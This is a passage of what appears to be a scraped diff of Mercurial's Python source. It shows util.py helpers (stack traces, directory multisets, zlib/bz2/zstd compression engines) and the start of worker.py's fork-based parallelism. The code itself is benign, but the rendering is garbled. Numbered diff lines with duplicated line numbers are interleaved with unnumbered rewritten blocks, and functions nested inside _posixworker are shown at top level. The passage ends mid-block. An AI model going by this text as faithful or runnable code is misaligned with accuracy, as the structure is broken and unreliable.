    '''
    # NOTE: extract_stack() is kept inside the comprehension so the number
    # of frames stripped by [:-skip - 1] matches the original exactly
    entries = [(fileline % (fname, lineno), funcname)
               for fname, lineno, funcname, _text
               in traceback.extract_stack()[:-skip - 1]][-depth:]
    if not entries:
        return
    # width of the widest "file:line" string, used to align the output
    width = max(len(location) for location, _func in entries)
    for location, funcname in entries:
        if line is None:
            yield (width, location, funcname)
        else:
            yield line % (width, location, funcname)
3145
3145
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # flush the other stream first so the trace does not interleave
        # with buffered output
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this helper itself from the reported frames
    for entry in getstackframes(skip + 1, depth=depth):
        f.write(entry)
    f.flush()
3160
3160
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count
        self._dirs = {}
        if skip is not None and safehasattr(map, 'iteritems'):
            # dirstate-style mapping: honor the 'skip' state filter
            for fname, entry in map.iteritems():
                if entry[0] != skip:
                    self.addpath(fname)
        else:
            for fname in map:
                self.addpath(fname)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # all shallower ancestors are already counted
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # shallower ancestors keep their remaining references
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3196
3196
# prefer the C implementation of dirs when the parsers module provides one
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3199
3199
def finddirs(path):
    """Yield each ancestor directory of a '/'-separated path, deepest
    first ('a/b/c' -> 'a/b', 'a')."""
    index = len(path)
    while True:
        index = path.rfind('/', 0, index)
        if index == -1:
            return
        yield path[:index]
3205
3205
3206 # compression code
3206 # compression code
3207
3207
# roles used when negotiating wire-protocol compression support
SERVERROLE = 'server'
CLIENTROLE = 'client'

# declares a compression engine's wire-protocol participation: its format
# name plus the advertisement priority for each role (see
# compressionengine.wireprotosupport for the semantics of the priorities)
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3214
3214
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ``error.Abort`` when any identifier declared by the engine
        (name, bundle name, bundle type, wire type, revlog header) was
        already claimed by a previously registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # An empty bundlename means the engine declared no external
            # facing name; it is then only reachable via its bundle type.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def _forname(self, name):
        """Return the engine registered under ``name``, checking
        availability.

        Consolidates the lookup-and-availability check previously
        duplicated across forbundlename(), forbundletype() and
        forwiretype().
        """
        engine = self._engines[name]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._forname(self._bundlenames[bundlename])

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._forname(self._bundletypes[bundletype])

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        # sorted() already returns a list; the extra list() was redundant
        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire protocol type.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._forname(self._wiretypes[wiretype])

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3368
3368
# module-level registry instance; engines register themselves against it
compengines = compressormanager()
3370
3370
3371 class compressionengine(object):
3371 class compressionengine(object):
3372 """Base class for compression engines.
3372 """Base class for compression engines.
3373
3373
3374 Compression engines must implement the interface defined by this class.
3374 Compression engines must implement the interface defined by this class.
3375 """
3375 """
3376 def name(self):
3376 def name(self):
3377 """Returns the name of the compression engine.
3377 """Returns the name of the compression engine.
3378
3378
3379 This is the key the engine is registered under.
3379 This is the key the engine is registered under.
3380
3380
3381 This method must be implemented.
3381 This method must be implemented.
3382 """
3382 """
3383 raise NotImplementedError()
3383 raise NotImplementedError()
3384
3384
3385 def available(self):
3385 def available(self):
3386 """Whether the compression engine is available.
3386 """Whether the compression engine is available.
3387
3387
3388 The intent of this method is to allow optional compression engines
3388 The intent of this method is to allow optional compression engines
3389 that may not be available in all installations (such as engines relying
3389 that may not be available in all installations (such as engines relying
3390 on C extensions that may not be present).
3390 on C extensions that may not be present).
3391 """
3391 """
3392 return True
3392 return True
3393
3393
3394 def bundletype(self):
3394 def bundletype(self):
3395 """Describes bundle identifiers for this engine.
3395 """Describes bundle identifiers for this engine.
3396
3396
3397 If this compression engine isn't supported for bundles, returns None.
3397 If this compression engine isn't supported for bundles, returns None.
3398
3398
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 the user-facing "bundle spec" compression name and an internal
3400 the user-facing "bundle spec" compression name and an internal
3401 identifier used to denote the compression format within bundles. To
3401 identifier used to denote the compression format within bundles. To
3402 exclude the name from external usage, set the first element to ``None``.
3402 exclude the name from external usage, set the first element to ``None``.
3403
3403
3404 If bundle compression is supported, the class must also implement
3404 If bundle compression is supported, the class must also implement
3405 ``compressstream`` and `decompressorreader``.
3405 ``compressstream`` and `decompressorreader``.
3406
3406
3407 The docstring of this method is used in the help system to tell users
3407 The docstring of this method is used in the help system to tell users
3408 about this engine.
3408 about this engine.
3409 """
3409 """
3410 return None
3410 return None
3411
3411
3412 def wireprotosupport(self):
3412 def wireprotosupport(self):
3413 """Declare support for this compression format on the wire protocol.
3413 """Declare support for this compression format on the wire protocol.
3414
3414
3415 If this compression engine isn't supported for compressing wire
3415 If this compression engine isn't supported for compressing wire
3416 protocol payloads, returns None.
3416 protocol payloads, returns None.
3417
3417
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 fields:
3419 fields:
3420
3420
3421 * String format identifier
3421 * String format identifier
3422 * Integer priority for the server
3422 * Integer priority for the server
3423 * Integer priority for the client
3423 * Integer priority for the client
3424
3424
3425 The integer priorities are used to order the advertisement of format
3425 The integer priorities are used to order the advertisement of format
3426 support by server and client. The highest integer is advertised
3426 support by server and client. The highest integer is advertised
3427 first. Integers with non-positive values aren't advertised.
3427 first. Integers with non-positive values aren't advertised.
3428
3428
3429 The priority values are somewhat arbitrary and only used for default
3429 The priority values are somewhat arbitrary and only used for default
3430 ordering. The relative order can be changed via config options.
3430 ordering. The relative order can be changed via config options.
3431
3431
3432 If wire protocol compression is supported, the class must also implement
3432 If wire protocol compression is supported, the class must also implement
3433 ``compressstream`` and ``decompressorreader``.
3433 ``compressstream`` and ``decompressorreader``.
3434 """
3434 """
3435 return None
3435 return None
3436
3436
    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        # Default: engine does not participate in revlog compression.
        return None
3446
3446
    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.

        Engines that advertise wire protocol or bundle support must override
        this; the base implementation always raises ``NotImplementedError``.
        """
        raise NotImplementedError()
3458
3458
    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.

        Engines that advertise wire protocol or bundle support must override
        this; the base implementation always raises ``NotImplementedError``.
        """
        raise NotImplementedError()
3467
3467
    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.

        Engines that declare a ``revlogheader()`` must override this; the
        base implementation always raises ``NotImplementedError``.
        """
        raise NotImplementedError()
3487
3487
class _zlibengine(compressionengine):
    """Compression engine backed by the stdlib ``zlib`` module."""

    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        # Medium (20) priority for both server and client ordering.
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        # 'x' (0x78) is the first byte of a zlib stream with default
        # settings, so it doubles as the revlog chunk identifier.
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        # -1 selects zlib's default compression level.
        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        # Implements the revlogcompressor() contract documented on
        # compressionengine.

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small for compression to plausibly win.
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    # Feed 1 MB (2**20 byte) slices at a time.
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                # Only use the compressed form when it is actually smaller.
                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3574
3574
class _bz2engine(compressionengine):
    """Compression engine backed by the stdlib ``bz2`` module."""

    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # 9 is bz2's maximum (and default) compression level.
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer internally and emit nothing for a chunk.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3617
3617
class _truncatedbz2engine(compressionengine):
    """Decompression-only engine for bzip2 streams missing the 'BZ' magic.

    Used for legacy payloads whose leading 'BZ' header was stripped; this
    engine feeds the magic back into the decompressor before the real data.
    """

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No human-readable bundle spec name: this format is internal-only.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3638
3638
class _noopengine(compressionengine):
    """Pseudo engine that passes data through without any compression."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: hand the chunk iterator back untouched.
        return it

    def decompressorreader(self, fh):
        # Nothing to decode; the file object already yields the raw data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Never claims to have compressed anything.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3673
3673
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled ``zstd`` module."""

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # Only available when the optional zstd C extension imported.
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        # Highest default priority (50) for both server and client.
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # 0x28 — presumably the first byte of the zstd frame magic; this is
        # what routes revlog chunks back to this engine.
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            # compressobj may buffer and emit nothing for a given chunk.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        # Implements the revlogcompressor() contract documented on
        # compressionengine.

        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to plausibly win.
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream large inputs in recommended-size slices to bound
                # memory usage.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                # Only use the compressed form when it is actually smaller.
                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3802
3802
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    items = {}
    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            # Engines without a public bundle spec name are internal-only.
            continue

        origdoc = engine.bundletype.__doc__
        holder = docobject()
        holder.__doc__ = pycompat.sysstr('``%s``\n    %s') % (bt[0], origdoc)
        holder._origdoc = origdoc
        holder._origfunc = engine.bundletype
        items[bt[0]] = holder

    return items
3834
3834
# Expose the per-engine help docstrings so the i18n tooling picks them up
# for translation.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3839
3839
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    taken = others if others is not None else set()

    # First try the bare "name~tag" form.
    candidate = '%s~%s' % (f, tag)
    if candidate not in ctx and candidate not in taken:
        return candidate

    # Otherwise append an increasing numeric suffix until a free name
    # is found.
    for suffix in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, suffix)
        if candidate not in ctx and candidate not in taken:
            return candidate
@@ -1,240 +1,240 b''
1 # worker.py - master-slave parallelism support
1 # worker.py - master-slave parallelism support
2 #
2 #
3 # Copyright 2013 Facebook, Inc.
3 # Copyright 2013 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import os
11 import os
12 import signal
12 import signal
13 import sys
13 import sys
14
14
15 from .i18n import _
15 from .i18n import _
16 from . import (
16 from . import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 scmutil,
20 scmutil,
21 util,
21 util,
22 )
22 )
23
23
def countcpus():
    '''try to count the number of CPUs on the system'''

    # POSIX: sysconf exposes the number of online processors.
    try:
        count = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
    except (AttributeError, ValueError):
        pass
    else:
        if count > 0:
            return count

    # Windows: fall back to the NUMBER_OF_PROCESSORS environment variable.
    try:
        count = int(encoding.environ['NUMBER_OF_PROCESSORS'])
    except (KeyError, ValueError):
        pass
    else:
        if count > 0:
            return count

    # Conservative default when neither probe yields a usable answer.
    return 1
44
44
45 def _numworkers(ui):
45 def _numworkers(ui):
46 s = ui.config('worker', 'numcpus')
46 s = ui.config('worker', 'numcpus')
47 if s:
47 if s:
48 try:
48 try:
49 n = int(s)
49 n = int(s)
50 if n >= 1:
50 if n >= 1:
51 return n
51 return n
52 except ValueError:
52 except ValueError:
53 raise error.Abort(_('number of cpus must be an integer'))
53 raise error.Abort(_('number of cpus must be an integer'))
54 return min(max(countcpus(), 4), 32)
54 return min(max(countcpus(), 4), 32)
55
55
if pycompat.isposix:
    # fork() on POSIX is cheap, so model a tiny per-worker startup cost.
    _startupcost = 0.01
else:
    # No cheap process spawn elsewhere: make parallelism effectively
    # never worthwhile.
    _startupcost = 1e30
60
60
def worthwhile(ui, costperop, nops):
    '''try to determine whether the benefit of multiple processes can
    outweigh the cost of starting them'''
    linear = costperop * nops
    nworkers = _numworkers(ui)
    # Estimated parallel cost: startup overhead plus the evenly split work.
    parallel = _startupcost * nworkers + linear / nworkers
    return linear - parallel >= 0.15
68
68
def worker(ui, costperarg, func, staticargs, args):
    '''run a function, possibly in parallel in multiple worker
    processes.

    returns a progress iterator

    costperarg - cost of a single task

    func - function to run

    staticargs - arguments to pass to every invocation of the function

    args - arguments to split into chunks, to pass to individual
    workers
    '''
    if not worthwhile(ui, costperarg, len(args)):
        # Too little work to amortize process startup: run serially.
        return func(*staticargs + (args,))
    return _platformworker(ui, func, staticargs, args)
87
87
88 def _posixworker(ui, func, staticargs, args):
88 def _posixworker(ui, func, staticargs, args):
89 rfd, wfd = os.pipe()
89 rfd, wfd = os.pipe()
90 workers = _numworkers(ui)
90 workers = _numworkers(ui)
91 oldhandler = signal.getsignal(signal.SIGINT)
91 oldhandler = signal.getsignal(signal.SIGINT)
92 signal.signal(signal.SIGINT, signal.SIG_IGN)
92 signal.signal(signal.SIGINT, signal.SIG_IGN)
93 pids, problem = set(), [0]
93 pids, problem = set(), [0]
94 def killworkers():
94 def killworkers():
95 # unregister SIGCHLD handler as all children will be killed. This
95 # unregister SIGCHLD handler as all children will be killed. This
96 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
96 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
97 # could be updated while iterating, which would cause inconsistency.
97 # could be updated while iterating, which would cause inconsistency.
98 signal.signal(signal.SIGCHLD, oldchldhandler)
98 signal.signal(signal.SIGCHLD, oldchldhandler)
99 # if one worker bails, there's no good reason to wait for the rest
99 # if one worker bails, there's no good reason to wait for the rest
100 for p in pids:
100 for p in pids:
101 try:
101 try:
102 os.kill(p, signal.SIGTERM)
102 os.kill(p, signal.SIGTERM)
103 except OSError as err:
103 except OSError as err:
104 if err.errno != errno.ESRCH:
104 if err.errno != errno.ESRCH:
105 raise
105 raise
106 def waitforworkers(blocking=True):
106 def waitforworkers(blocking=True):
107 for pid in pids.copy():
107 for pid in pids.copy():
108 p = st = 0
108 p = st = 0
109 while True:
109 while True:
110 try:
110 try:
111 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
111 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
112 break
112 break
113 except OSError as e:
113 except OSError as e:
114 if e.errno == errno.EINTR:
114 if e.errno == errno.EINTR:
115 continue
115 continue
116 elif e.errno == errno.ECHILD:
116 elif e.errno == errno.ECHILD:
117 # child would already be reaped, but pids yet been
117 # child would already be reaped, but pids yet been
118 # updated (maybe interrupted just after waitpid)
118 # updated (maybe interrupted just after waitpid)
119 pids.discard(pid)
119 pids.discard(pid)
120 break
120 break
121 else:
121 else:
122 raise
122 raise
123 if not p:
123 if not p:
124 # skip subsequent steps, because child process should
124 # skip subsequent steps, because child process should
125 # be still running in this case
125 # be still running in this case
126 continue
126 continue
127 pids.discard(p)
127 pids.discard(p)
128 st = _exitstatus(st)
128 st = _exitstatus(st)
129 if st and not problem[0]:
129 if st and not problem[0]:
130 problem[0] = st
130 problem[0] = st
131 def sigchldhandler(signum, frame):
131 def sigchldhandler(signum, frame):
132 waitforworkers(blocking=False)
132 waitforworkers(blocking=False)
133 if problem[0]:
133 if problem[0]:
134 killworkers()
134 killworkers()
135 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
135 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
136 ui.flush()
136 ui.flush()
137 parentpid = os.getpid()
137 parentpid = os.getpid()
138 for pargs in partition(args, workers):
138 for pargs in partition(args, workers):
139 # make sure we use os._exit in all worker code paths. otherwise the
139 # make sure we use os._exit in all worker code paths. otherwise the
140 # worker may do some clean-ups which could cause surprises like
140 # worker may do some clean-ups which could cause surprises like
141 # deadlock. see sshpeer.cleanup for example.
141 # deadlock. see sshpeer.cleanup for example.
142 # override error handling *before* fork. this is necessary because
142 # override error handling *before* fork. this is necessary because
143 # exception (signal) may arrive after fork, before "pid =" assignment
143 # exception (signal) may arrive after fork, before "pid =" assignment
144 # completes, and other exception handler (dispatch.py) can lead to
144 # completes, and other exception handler (dispatch.py) can lead to
145 # unexpected code path without os._exit.
145 # unexpected code path without os._exit.
146 ret = -1
146 ret = -1
147 try:
147 try:
148 pid = os.fork()
148 pid = os.fork()
149 if pid == 0:
149 if pid == 0:
150 signal.signal(signal.SIGINT, oldhandler)
150 signal.signal(signal.SIGINT, oldhandler)
151 signal.signal(signal.SIGCHLD, oldchldhandler)
151 signal.signal(signal.SIGCHLD, oldchldhandler)
152
152
def workerfunc():
    # NOTE(review): reconstructed from a scraped diff rendering (duplicated,
    # number-prefixed lines); logic unchanged. Nested in _posixworker's
    # fork loop: runs only in the forked CHILD. Closes over rfd/wfd (the
    # result pipe), func, staticargs and pargs.
    """Run the worker payload in the child, streaming results to the parent.

    Closes the read end of the pipe, then writes one "index item\\n"
    record per result onto the write end. Returns 0 on success.
    """
    os.close(rfd)
    for i, item in func(*(staticargs + (pargs,))):
        os.write(wfd, '%d %s\n' % (i, item))
    return 0
158
158
159 ret = scmutil.callcatch(ui, workerfunc)
159 ret = scmutil.callcatch(ui, workerfunc)
160 except: # parent re-raises, child never returns
160 except: # parent re-raises, child never returns
161 if os.getpid() == parentpid:
161 if os.getpid() == parentpid:
162 raise
162 raise
163 exctype = sys.exc_info()[0]
163 exctype = sys.exc_info()[0]
164 force = not issubclass(exctype, KeyboardInterrupt)
164 force = not issubclass(exctype, KeyboardInterrupt)
165 ui.traceback(force=force)
165 ui.traceback(force=force)
166 finally:
166 finally:
167 if os.getpid() != parentpid:
167 if os.getpid() != parentpid:
168 try:
168 try:
169 ui.flush()
169 ui.flush()
170 except: # never returns, no re-raises
170 except: # never returns, no re-raises
171 pass
171 pass
172 finally:
172 finally:
173 os._exit(ret & 255)
173 os._exit(ret & 255)
174 pids.add(pid)
174 pids.add(pid)
175 os.close(wfd)
175 os.close(wfd)
176 fp = os.fdopen(rfd, pycompat.sysstr('rb'), 0)
176 fp = os.fdopen(rfd, pycompat.sysstr('rb'), 0)
def cleanup():
    # NOTE(review): reconstructed from a scraped diff rendering (duplicated,
    # number-prefixed lines); logic unchanged. Nested in _posixworker:
    # closes over oldhandler/oldchldhandler (saved signal dispositions),
    # waitforworkers and problem.
    """Restore signal handlers, wait for all workers, propagate failure.

    A negative recorded status means a worker died of a signal: re-raise
    that signal in the parent via os.kill so the parent dies the same
    way; otherwise exit with the worker's exit code.
    """
    signal.signal(signal.SIGINT, oldhandler)
    waitforworkers()
    signal.signal(signal.SIGCHLD, oldchldhandler)
    status = problem[0]
    if status:
        if status < 0:
            os.kill(os.getpid(), -status)
        sys.exit(status)
186 try:
186 try:
187 for line in util.iterfile(fp):
187 for line in util.iterfile(fp):
188 l = line.split(' ', 1)
188 l = line.split(' ', 1)
189 yield int(l[0]), l[1][:-1]
189 yield int(l[0]), l[1][:-1]
190 except: # re-raises
